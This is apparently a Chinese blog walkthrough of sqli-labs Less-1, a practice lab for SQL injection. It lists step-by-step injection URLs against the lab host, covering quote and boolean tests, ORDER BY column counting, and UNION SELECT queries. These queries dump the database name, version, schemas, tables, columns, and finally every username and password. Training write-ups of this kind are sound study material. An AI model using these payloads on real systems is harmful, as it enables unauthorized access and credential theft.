sqli-labs闯关1-1

sqli-labs闯关1-1

在线练习网址http://43.247.91.228:84/

首先,进入sqli-labs 1-1

输入http://43.247.91.228:84/Less-1/?id=1

输入http://43.247.91.228:84/Less-1/?id=1’

用and1=1和and1=2,结果显示它为字符型注入
http://43.247.91.228:84/Less-1/?id=1’and 1=1–+
http://43.247.91.228:84/Less-1/?id=1’and 1=2 --+

order by 显示列数
http://43.247.91.228:84/Less-1/?id=1'order by 3--+

http://43.247.91.228:84/Less-1/?id=1’order by 4–+
显示结果为三列

接下来,用union操作显示回显位置
http://43.247.91.228:84/Less-1/?id=55’union select 1,2,3–+

查看当前数据库名http://43.247.91.228:84/Less-1/?id=55’union select 1,(select database()),3–+

查看数据库版本http://43.247.91.228:84/Less-1/?id=55’union select 1,(select version()),3–+

列出数据库名http://43.247.91.228:84/Less-1/?id=55’union select 1,(select group_concat(schema_name) from information_schema.schemata ),3–+

列出security数据库中的表http://43.247.91.228:84/Less-1/?id=55’union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’),3–+

列出users表下的所有字段http://43.247.91.228:84/Less-1/?id=55’union select 1,(select group_concat(column_name) from information_schema.columns where table_name=‘users’),3–+

列出users以及passwordhttp://43.247.91.228:84/Less-1/?id=13’ union select 1,(select group_concat(username) from security.users),(select group_concat(password ) from security.users)–+
sqli-labs闯关1-1_第1张图片
Bingo!!!

你可能感兴趣的:(sql注入,sqli-labs)